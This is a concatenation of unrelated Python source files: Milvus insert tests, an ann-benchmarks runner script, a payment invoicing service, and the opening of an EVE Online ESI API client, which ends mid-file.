expected: the collection row count equals nb * nums
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
nums = 2
for i in range(nums):
mutation_res, _ = collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb * nums
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self):
"""
target: test building an index after inserting vectors
method: insert vectors and build index
expected: no error raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
class TestInsertInvalid(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert invalid params
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self):
"""
target: test insert with an invalid primary field type, which is not int64
method: create collection and insert entities in it
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
int_field = cf.gen_float_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
df = [int_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64."}
mutation_res, _ = collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
df = cf.gen_default_list_data(ct.default_nb)
error = {ct.err_code: 1, 'err_msg': "partition name is illegal"}
mutation_res, _ = collection_w.insert(data=df, partition_name="p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_with_invalid_field_value(self):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
vec_field = ct.get_invalid_vectors
df = [field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "The field of schema type must be FieldSchema."}
mutation_res, _ = collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
class TestInsertInvalidBinary(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert invalid params of binary
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_ids_binary_invalid(self):
"""
target: test insert using customized ids which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
field_one = cf.gen_float_field(is_primary=True)
field_two = cf.gen_float_field()
vec_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_binary_vec_field_name, dtype=DataType.BINARY_VECTOR)
df = [field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Data type is not support."}
mutation_res, _ = collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_binary_partition_name(self):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
partition_name = ct.get_invalid_strs
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
error = {ct.err_code: 1, 'err_msg': "The types of schema and data do not match."}
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_name, check_task=CheckTasks.err_res, check_items=error)
class TestInsertString(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert string
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_is_primary(self):
"""
target: test insert string is primary
method: 1.create a collection and string field is primary
2.insert string field data
expected: Insert Successfully
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_string_pk_default_collection_schema()
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[2]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("string_fields", [[cf.gen_string_field(name="string_field1")],
[cf.gen_string_field(name="string_field2")],
[cf.gen_string_field(name="string_field3")]])
def test_insert_multi_string_fields(self, string_fields):
"""
target: test insert multi string fields
method: 1.create a collection
2.Insert multi string fields
expected: Insert Successfully
"""
schema = cf.gen_schema_multi_string_fields(string_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_string_fields(string_fields=string_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_invalid_data(self):
"""
target: test insert string field data that does not match
method: 1.create a collection
2.Insert string field data that does not match the schema
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 2] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_name_invalid(self):
"""
target: test insert with an invalid string field name
method: 1.create a collection
2.Insert string field name is invalid
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = [cf.gen_int64_field(), cf.gen_string_field(name=ct.get_invalid_strs), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_length_exceed(self):
"""
target: test insert string field exceeding the maximum length
method: 1.create a collection
2.Insert string field whose length exceeds the maximum value of 65535
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nums = 70000
field_one = cf.gen_int64_field()
field_two = cf.gen_float_field()
field_three = cf.gen_string_field(max_length_per_row=nums)
vec_field = cf.gen_float_vec_field()
df = [field_one, field_two, field_three, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_string_field_dtype_invalid(self):
"""
target: test insert string field with an invalid dtype
method: 1.create a collection
2.Insert string field dtype is invalid
expected: Raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
string_field = self.field_schema_wrap.init_field_schema(name="string", dtype=DataType.STRING)[0]
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field()
df = [string_field, int_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_string_field_auto_id_is_true(self):
"""
target: test create collection with string field
method: 1.create a collection
2.Insert string field with auto id is true
expected: Raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
int_field = cf.gen_int64_field()
vec_field = cf.gen_float_vec_field()
string_field = cf.gen_string_field(is_primary=True, auto_id=True)
df = [int_field, string_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
|
main.py
|
from __future__ import absolute_import
import argparse
import logging
import logging.config
import docker
import multiprocessing.pool
import os
import psutil
import random
import shutil
import sys
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.constants import INDEX_DIR
from ann_benchmarks.algorithms.definitions import (get_definitions,
list_algorithms,
algorithm_status,
InstantiationStatus)
from ann_benchmarks.results import get_result_filename
from ann_benchmarks.runner import run, run_docker
def positive_int(s):
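# Argparse type helper: accepts only integers >= 1 (0 is also rejected, since `not i` is true for 0).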
i = None
try:
i = int(s)
except ValueError:
pass
if not i or i < 1:
raise argparse.ArgumentTypeError("%r is not a positive integer" % s)
return i
def run_worker(cpu, args, queue):
while not queue.empty():
definition = queue.get()
if args.local:
run(definition, args.dataset, args.count, args.runs, args.batch)
else:
memory_margin = 500e6 # reserve some extra memory for misc stuff
mem_limit = int((psutil.virtual_memory().available - memory_margin) / args.parallelism)
cpu_limit = str(cpu)
if args.batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
run_docker(definition, args.dataset, args.count,
args.runs, args.timeout, args.batch, cpu_limit, mem_limit)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset',
metavar='NAME',
help='the dataset to load training points from',
default='glove-100-angular',
choices=DATASETS.keys())
parser.add_argument(
"-k", "--count",
default=10,
type=positive_int,
help="the number of near neighbours to search for")
parser.add_argument(
'--definitions',
metavar='FILE',
help='load algorithm definitions from FILE',
default='algos.yaml')
parser.add_argument(
'--algorithm',
metavar='NAME',
help='run only the named algorithm',
default=None)
parser.add_argument(
'--docker-tag',
metavar='NAME',
help='run only algorithms in a particular docker image',
default=None)
parser.add_argument(
'--list-algorithms',
help='print the names of all known algorithms and exit',
action='store_true')
parser.add_argument(
'--force',
help='re-run algorithms even if their results already exist',
action='store_true')
parser.add_argument(
'--runs',
metavar='COUNT',
type=positive_int,
help='run each algorithm instance %(metavar)s times and use only'
' the best result',
default=5)
parser.add_argument(
'--timeout',
type=int,
help='Timeout (in seconds) for each individual algorithm run, or -1 '
'if no timeout should be set',
default=2 * 3600)
parser.add_argument(
'--local',
action='store_true',
help='If set, then will run everything locally (inside the same '
'process) rather than using Docker')
parser.add_argument(
'--batch',
action='store_true',
help='If set, algorithms get all queries at once')
parser.add_argument(
'--max-n-algorithms',
type=int,
help='Max number of algorithms to run (just used for testing)',
default=-1)
parser.add_argument(
'--run-disabled',
help='run algorithms that are disabled in algos.yaml',
action='store_true')
parser.add_argument(
'--parallelism',
type=positive_int,
help='Number of Docker containers in parallel',
default=1)
args = parser.parse_args()
if args.timeout == -1:
args.timeout = None
if args.list_algorithms:
list_algorithms(args.definitions)
sys.exit(0)
logging.config.fileConfig("logging.conf")
logger = logging.getLogger("annb")
# Nmslib specific code
# Remove old indices stored on disk
if os.path.exists(INDEX_DIR):
shutil.rmtree(INDEX_DIR)
dataset, dimension = get_dataset(args.dataset)
point_type = dataset.attrs.get('point_type', 'float')
distance = dataset.attrs['distance']
definitions = get_definitions(
args.definitions, dimension, point_type, distance, args.count)
# Filter out, from the loaded definitions, all those query argument groups
# that correspond to experiments that have already been run. (This might
# mean removing a definition altogether, so we can't just use a list
# comprehension.)
filtered_definitions = []
for definition in definitions:
query_argument_groups = definition.query_argument_groups
if not query_argument_groups:
query_argument_groups = [[]]
not_yet_run = []
for query_arguments in query_argument_groups:
fn = get_result_filename(args.dataset,
args.count, definition,
query_arguments, args.batch)
if args.force or not os.path.exists(fn):
not_yet_run.append(query_arguments)
if not_yet_run:
if definition.query_argument_groups:
definition = definition._replace(
query_argument_groups=not_yet_run)
filtered_definitions.append(definition)
definitions = filtered_definitions
random.shuffle(definitions)
if args.algorithm:
logger.info(f'running only {args.algorithm}')
definitions = [d for d in definitions if d.algorithm == args.algorithm]
if not args.local:
# See which Docker images we have available
docker_client = docker.from_env()
docker_tags = set()
for image in docker_client.images.list():
for tag in image.tags:
tag = tag.split(':')[0]
docker_tags.add(tag)
if args.docker_tag:
logger.info(f'running only {args.docker_tag}')
definitions = [
d for d in definitions if d.docker_tag == args.docker_tag]
if set(d.docker_tag for d in definitions).difference(docker_tags):
logger.info(f'not all docker images available, only: {set(docker_tags)}')
logger.info(f'missing docker images: '
f'{str(set(d.docker_tag for d in definitions).difference(docker_tags))}')
definitions = [
d for d in definitions if d.docker_tag in docker_tags]
else:
def _test(df):
status = algorithm_status(df)
# If the module was loaded but doesn't actually have a constructor
# of the right name, then the definition is broken
if status == InstantiationStatus.NO_CONSTRUCTOR:
raise Exception("%s.%s(%s): error: the module '%s' does not"
" expose the named constructor" % (
df.module, df.constructor,
df.arguments, df.module))
if status == InstantiationStatus.NO_MODULE:
# If the module couldn't be loaded (presumably because
# of a missing dependency), print a warning and remove
# this definition from the list of things to be run
logging.warning("%s.%s(%s): the module '%s' could not be "
"loaded; skipping" % (df.module, df.constructor,
df.arguments, df.module))
return False
else:
return True
definitions = [d for d in definitions if _test(d)]
if not args.run_disabled:
if len([d for d in definitions if d.disabled]):
logger.info(f'Not running disabled algorithms {[d for d in definitions if d.disabled]}')
definitions = [d for d in definitions if not d.disabled]
if args.max_n_algorithms >= 0:
definitions = definitions[:args.max_n_algorithms]
if len(definitions) == 0:
raise Exception('Nothing to run')
else:
logger.info(f'Order: {definitions}')
if args.parallelism > multiprocessing.cpu_count() - 1:
raise Exception('Parallelism larger than %d! (CPU count minus one)' % (multiprocessing.cpu_count() - 1))
# Multiprocessing magic to farm this out to all CPUs
queue = multiprocessing.Queue()
for definition in definitions:
queue.put(definition)
if args.batch and args.parallelism > 1:
raise Exception(f"Batch mode uses all available CPU resources, --parallelism should be set to 1. (Was: {args.parallelism})")
workers = [multiprocessing.Process(target=run_worker, args=(i+1, args, queue))
for i in range(args.parallelism)]
[worker.start() for worker in workers]
[worker.join() for worker in workers]
# TODO: need to figure out cleanup handling here
|
payment_service.py
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service class to control all the operations related to Payment."""
from threading import Thread
from typing import Any, Dict, Tuple
from flask import copy_current_request_context, current_app
from pay_api.exceptions import BusinessException
from pay_api.factory.payment_system_factory import PaymentSystemFactory
from pay_api.utils.constants import EDIT_ROLE
from pay_api.utils.enums import InvoiceReferenceStatus, InvoiceStatus, LineItemStatus, PaymentMethod, PaymentStatus
from pay_api.utils.errors import Error
from pay_api.utils.util import get_str_by_path
from .base_payment_system import PaymentSystemService
from .fee_schedule import FeeSchedule
from .invoice import Invoice
from .invoice_reference import InvoiceReference
from .payment import Payment
from .payment_account import PaymentAccount
from .payment_line_item import PaymentLineItem
from .payment_transaction import PaymentTransaction
class PaymentService: # pylint: disable=too-few-public-methods
"""Service to manage Payment related operations."""
@classmethod
def create_invoice(cls, payment_request: Tuple[Dict[str, Any]], authorization: Tuple[Dict[str, Any]]) -> Dict:
# pylint: disable=too-many-locals, too-many-statements
"""Create payment related records.
Does the following:
1. Calculate the fees based on the filing types received.
2. Check if the payment account exists,
2.1 If yes, use the one from database.
2.2 Else create one in payment system and update database.
3. Create payment record in database and flush.
4. Create invoice record in database and flush.
5. Create payment line items in database and flush.
6. Create invoice in payment system;
6.1 If successful, update the invoice table with references from the payment system.
6.1.1 If that fails, adjust the invoice to zero and roll back the transaction.
6.2 If it fails, roll back the transaction.
"""
current_app.logger.debug('<create_invoice %s', payment_request)
business_info = payment_request.get('businessInfo')
filing_info = payment_request.get('filingInfo')
account_info = payment_request.get('accountInfo', None)
filing_id = filing_info.get('filingIdentifier', None)
folio_number = filing_info.get('folioNumber', get_str_by_path(authorization, 'business/folioNumber'))
corp_type = business_info.get('corpType', None)
payment_account = cls._find_payment_account(authorization)
payment_method = _get_payment_method(payment_request, payment_account)
bcol_account = cls._get_bcol_account(account_info, payment_account)
# Calculate the fees
current_app.logger.debug('Calculate the fees')
fees = _calculate_fees(corp_type, filing_info)
# Create payment system instance from factory
current_app.logger.debug('Creating PaymentSystemService impl')
pay_service: PaymentSystemService = PaymentSystemFactory.create(
payment_method=payment_method,
corp_type=corp_type,
fees=sum(fee.total for fee in fees),
account_info=account_info,
payment_account=payment_account
)
pay_system_invoice: Dict[str, Any] = None
invoice: Invoice = None
try:
current_app.logger.debug('Creating Invoice record')
invoice = Invoice()
invoice.bcol_account = bcol_account
invoice.payment_account_id = payment_account.id
invoice.cfs_account_id = payment_account.cfs_account_id
invoice.invoice_status_code = pay_service.get_default_invoice_status()
invoice.service_fees = sum(fee.service_fees for fee in fees) if fees else 0
invoice.total = sum(fee.total for fee in fees) if fees else 0
invoice.paid = 0
invoice.refund = 0
invoice.routing_slip = get_str_by_path(account_info, 'routingSlip')
invoice.filing_id = filing_id
invoice.dat_number = get_str_by_path(account_info, 'datNumber')
invoice.folio_number = folio_number
invoice.business_identifier = business_info.get('businessIdentifier')
invoice.payment_method_code = pay_service.get_payment_method_code()
invoice.corp_type_code = corp_type
invoice.details = payment_request.get('details', None)
invoice = invoice.flush()
line_items = []
for fee in fees:
current_app.logger.debug('Creating line items')
line_items.append(PaymentLineItem.create(invoice.id, fee))
current_app.logger.debug('Handing off to payment system to create invoice')
invoice_reference = pay_service.create_invoice(payment_account, line_items, invoice,
corp_type_code=invoice.corp_type_code)
current_app.logger.debug('Updating invoice record')
invoice.commit()
pay_service.complete_post_invoice(invoice, invoice_reference)
invoice = Invoice.find_by_id(invoice.id, skip_auth_check=True)
except Exception as e: # NOQA pylint: disable=broad-except
current_app.logger.error('Rolling back as an error occurred!')
current_app.logger.error(e)
if invoice:
invoice.rollback()
if pay_system_invoice:
pay_service.cancel_invoice(
payment_account,
pay_system_invoice.get('invoice_number'),
)
raise
current_app.logger.debug('>create_invoice')
return invoice.asdict(include_dynamic_fields=True)
@classmethod
def _find_payment_account(cls, authorization):
# find payment account
payment_account: PaymentAccount = PaymentAccount.find_account(authorization)
# If there is no payment_account it must be a request with no account (NR, Staff payment etc.)
# and invoked using a service account or a staff token
if not payment_account:
payment_method = get_str_by_path(authorization,
'account/paymentInfo/methodOfPayment') or _get_default_payment()
payment_account = PaymentAccount.create(
dict(
accountId=get_str_by_path(authorization, 'account/id'),
paymentInfo=dict(methodOfPayment=payment_method)
)
)
return payment_account
@classmethod
def _get_bcol_account(cls, account_info, payment_account: PaymentAccount):
if account_info and account_info.get('bcolAccountNumber', None):
bcol_account = account_info.get('bcolAccountNumber')
else:
bcol_account = payment_account.bcol_account
return bcol_account
@classmethod
def update_invoice(cls, invoice_id: int, payment_request: Tuple[Dict[str, Any]], is_apply_credit: bool = False):
"""Update invoice related records."""
current_app.logger.debug('<update_invoice')
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=False)
# If the call is to apply credit, apply credit and release records.
if is_apply_credit:
credit_balance: float = 0
payment_account: PaymentAccount = PaymentAccount.find_by_id(invoice.payment_account_id)
invoice_balance = invoice.total - (invoice.paid or 0)
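# If the account credit covers the full balance, pay the invoice entirely from credit; otherwise apply whatever credit exists and leave the remainder outstanding.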
if (payment_account.credit or 0) >= invoice_balance:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
invoice.payment_method_code)
# Only release records, as the actual status change should happen during reconciliation.
pay_service.apply_credit(invoice)
credit_balance = payment_account.credit - invoice_balance
invoice.paid = invoice.total
invoice.save()
elif (payment_account.credit or 0) <= invoice_balance:
invoice.paid = (invoice.paid or 0) + payment_account.credit
invoice.save()
payment_account.credit = credit_balance
payment_account.save()
else:
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
is_not_currently_on_ob = invoice.payment_method_code != PaymentMethod.ONLINE_BANKING.value
is_not_changing_to_cc = payment_method not in (PaymentMethod.CC.value, PaymentMethod.DIRECT_PAY.value)
# can patch only if the current payment method is OB
if is_not_currently_on_ob or is_not_changing_to_cc:
raise BusinessException(Error.INVALID_REQUEST)
# check if it has any invoice references already created
# if there is any invoice ref , send them to the invoiced credit card flow
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
if invoice_reference:
invoice.payment_method_code = PaymentMethod.CC.value
else:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
PaymentMethod.DIRECT_PAY.value)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
pay_service.create_invoice(payment_account, invoice.payment_line_items, invoice,
corp_type_code=invoice.corp_type_code)
invoice.payment_method_code = PaymentMethod.DIRECT_PAY.value
invoice.save()
current_app.logger.debug('>update_invoice')
return invoice.asdict()
@classmethod
def delete_invoice(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Delete invoice related records.
Does the following:
1. Check if payment is eligible to be deleted.
2. Mark the payment and invoices records as deleted.
3. Publish message to queue
"""
current_app.logger.debug('<delete_invoice')
# update transaction function will update the status from PayBC
_update_active_transactions(invoice_id)
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=True)
# Create the payment system implementation
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(invoice.payment_method_code)
# set payment status as deleted
payment = Payment.find_payment_for_invoice(invoice_id)
_check_if_invoice_can_be_deleted(invoice, payment)
if payment:
payment.payment_status_code = PaymentStatus.DELETED.value
payment.flush()
# Cancel invoice
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
if invoice_reference:
pay_service.cancel_invoice(payment_account=payment_account, inv_number=invoice_reference.invoice_number)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
for line in invoice.payment_line_items:
line.line_item_status_code = LineItemStatus.CANCELLED.value
invoice_reference.status_code = InvoiceReferenceStatus.CANCELLED.value
invoice_reference.flush()
invoice.save()
current_app.logger.debug('>delete_invoice')
@classmethod
def accept_delete(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Mark payment related records to be deleted."""
current_app.logger.debug('<accept_delete')
invoice: Invoice = Invoice.find_by_id(invoice_id, one_of_roles=[EDIT_ROLE])
_check_if_invoice_can_be_deleted(invoice)
invoice.payment_status_code = InvoiceStatus.DELETE_ACCEPTED.value
invoice.save()
@copy_current_request_context
def run_delete():
"""Call delete payment."""
PaymentService.delete_invoice(invoice_id)
current_app.logger.debug('Starting thread to delete invoice.')
thread = Thread(target=run_delete)
thread.start()
current_app.logger.debug('>accept_delete')
def _calculate_fees(corp_type, filing_info):
"""Calculate and return the fees based on the filing type codes."""
fees = []
service_fee_applied: bool = False
for filing_type_info in filing_info.get('filingTypes'):
current_app.logger.debug(f"Getting fees for {filing_type_info.get('filingTypeCode')} ")
fee: FeeSchedule = FeeSchedule.find_by_corp_type_and_filing_type(
corp_type=corp_type,
filing_type_code=filing_type_info.get('filingTypeCode', None),
valid_date=filing_info.get('date', None),
jurisdiction=None,
is_priority=filing_type_info.get('priority'),
is_future_effective=filing_type_info.get('futureEffective'),
waive_fees=filing_type_info.get('waiveFees'),
quantity=filing_type_info.get('quantity')
)
# If service fee is already applied, do not charge again.
if service_fee_applied:
fee.service_fees = 0
elif fee.service_fees > 0:
service_fee_applied = True
if fee.variable:
fee.fee_amount = float(filing_type_info.get('fee', 0))
if filing_type_info.get('filingDescription'):
fee.description = filing_type_info.get('filingDescription')
fees.append(fee)
return fees
def _update_active_transactions(invoice_id: int):
# update active transactions
current_app.logger.debug('<_update_active_transactions')
transaction: PaymentTransaction = PaymentTransaction.find_active_by_invoice_id(invoice_id)
if transaction:
# check existing payment status in PayBC;
PaymentTransaction.update_transaction(transaction.id, pay_response_url=None)
def _check_if_invoice_can_be_deleted(invoice: Invoice, payment: Payment = None):
if invoice.invoice_status_code in (InvoiceStatus.PAID.value, InvoiceStatus.DELETED.value,
InvoiceStatus.APPROVED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
if payment and payment.payment_status_code in (PaymentStatus.COMPLETED.value, PaymentStatus.DELETED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
def _get_payment_method(payment_request: Dict, payment_account: PaymentAccount):
# If no methodOfPayment is provided, use the one against the payment account table.
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
if not payment_method:
payment_method = payment_account.payment_method
if not payment_method:
payment_method = _get_default_payment()
return payment_method
def _get_default_payment() -> str:
return PaymentMethod.DIRECT_PAY.value
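# Illustrative sketch (not part of the service API): the helpers above resolve
# the payment method with a three-step fallback -- the request body first, then
# the payment account's configured method, then the module default. The helper
# name and sample inputs below are hypothetical.
def _example_payment_method_fallback(payment_request: Dict, account_method=None) -> str:
    """Mirror _get_payment_method's fallback order for plain inputs."""
    requested = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
    return requested or account_method or _get_default_payment()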
|
eve_simple_esi.py
|
# Thanks Qandra-Si (https://github.com/Qandra-Si) for help and basis of implementation
import urllib
import requests
import base64
import hashlib
import secrets
import sys
import time
import json
import webview
from http.server import HTTPServer, CGIHTTPRequestHandler, BaseHTTPRequestHandler
import threading
import re
import os
from jose import jwt
from jose.exceptions import ExpiredSignatureError, JWTError, JWTClaimsError
import shelve
import hashlib
class ESICacheServer:
def __init__(self,file_name='cache.db'):
self.db_file=file_name
self.db=shelve.open(self.db_file)
def Get(self,key):
if key in self.db:
return self.db[key]
return None
def Del(self,key):
del self.db[key]
def Set(self,key,data):
self.db[key]=data
def Clear(self,force=False):
if force:
self.db.close()
exts=['bak','dat','dir']
for ext in exts:
os.remove(self.db_file+"."+ext)
self.db=shelve.open(self.db_file)
else:
self.db.clear()
def Close(self):
self.db.close()
def Sync(self):
self.db.sync()
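# Minimal usage sketch for ESICacheServer (key and payload below are
# illustrative; the ESI class stores {'header': ..., 'data': ...} records):
#   cache = ESICacheServer('example_cache.db')
#   cache.Set('some-request-hash', {'header': {}, 'data': []})
#   entry = cache.Get('some-request-hash')  # the stored dict, or None
#   cache.Sync()
#   cache.Close()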
class ESIAuthWebServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
query=urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
if not 'state' in query:
return
state=query['state'][0]
if not state in self.server.parent.on_success:
return
if 'code' in query:
self.server.parent.on_success[state](query)
else:
self.server.parent.on_error[state](self.path)
del self.server.parent.on_success[state]
del self.server.parent.on_error[state]
if ((len(self.server.parent.on_success) == 0 ) and ( len(self.server.parent.on_error) == 0 )):
self.server.shutdown()
class ESIAuthWebServer:
def __init__(self, local_address='localhost', port=8635):
self.local_address=local_address
self.port=port
self.on_success={}
self.on_error={}
self.WebServer=None
self.daemon=None
def reg_callback(self,state,on_success,on_error):
server_need_start=False
if ((len(self.on_success) == 0 ) and ( len(self.on_error) == 0 )):
server_need_start=True
self.on_success[state]=on_success
self.on_error[state]=on_error
if server_need_start:
self.start()
def start_server(self, local_address, port, parent):
self.WebServer = HTTPServer((local_address, port), ESIAuthWebServerRequestHandler)
self.WebServer.parent=parent
self.WebServer.serve_forever()
def start(self):
self.daemon = threading.Thread(name='daemon_server', target=self.start_server, args=(self.local_address, self.port, self))
self.daemon.setDaemon(True) # Set as a daemon so it will be killed once the main thread is dead.
self.daemon.start()
def stop(self):
self.WebServer.shutdown()
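# Lifecycle note for ESIAuthWebServer: the HTTP server is started lazily by the
# first reg_callback() call and runs in a daemon thread; the request handler
# drops each state's callbacks once the SSO redirect arrives and shuts the
# server down when no pending states remain.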
class ESIUserDataStorage:
def __init__(self,work_dir='.',file_pattern='User_Data_%.json',indent="\t"):
self.work_dir=work_dir
self.file_pattern=file_pattern
self.indent=indent
def open(self,char_name):
file_name=os.path.join(self.work_dir,self.file_pattern.replace('%',char_name))
return file_name
def read(self,char_name):
file_name=self.open(char_name)
if not os.path.exists(file_name):
return None
with open(file_name, "r") as f:
data = json.load(f)
return data
def write(self,char_name,data):
file_name=self.open(char_name)
with open(file_name, "w+") as f:
json.dump(data,f,indent=self.indent)
class ESIGUIWindow:
def __init__(self):
from webview.platforms.cef import settings
settings.update({
'persist_session_cookies': True
})
self.guilib = webview.initialize('cef')
def show(self,title, url=None, html=None, js_api=None, width=580, height=1024, x=None, y=None, resizable=True, fullscreen=False, min_size=(200, 100), hidden=False, frameless=False, easy_drag=True, minimized=False, on_top=True, confirm_close=False, background_color='#FFFFFF', transparent=False, text_select=False):
self.window=webview.create_window(title,url=url, html=html, js_api=js_api, width=width, height=height, x=x, y=y, resizable=resizable, fullscreen=fullscreen, min_size=min_size, hidden=hidden, frameless=frameless, easy_drag=easy_drag, minimized=minimized, on_top=on_top, confirm_close=confirm_close, background_color=background_color, transparent=transparent, text_select=text_select) #580 x 1024
self.window._initialize(self.guilib, False , False)
self.guilib.create_window(self.window)
def destroy(self):
self.window.destroy()
class ESI:
def __init__(self,
settings,
name=None,
gui=True,
use_cache=True,
max_consistent_try=20,
debug=False,
callback_print=None,
callback_input=None,
callback_web_server=None,
callback_saved_data=None,
callback_cache_server=None,
callback_gui_window_class=None
):
"""Prints the URL to redirect users to.
Args:
settings: (Required) settings object with client_id, client_secret etc..
name: (None) string with the name of a stored user to authenticate automatically
gui: (True) bool, prefer the GUI auth method
use_cache: (True) bool, cache request results
max_consistent_try: (20) int, maximum attempts to fetch a consistent set of pages
debug: (False) bool, print extra debug output
callback_print: (Optional)
def callback_print(string):
...
callback_input: (Optional)
def callback_input(string_prompt):
...
return str(auth_code)
callback_web_server: (Optional)
class callback_web_server(address, port):
def reg_callback(state_string, on_success_function, on_error_function):
...
callback_saved_data: (Optional)
class callback_saved_data:
def read(char_name):
...
return json.loads(saved_data)
def write(char_name,data):
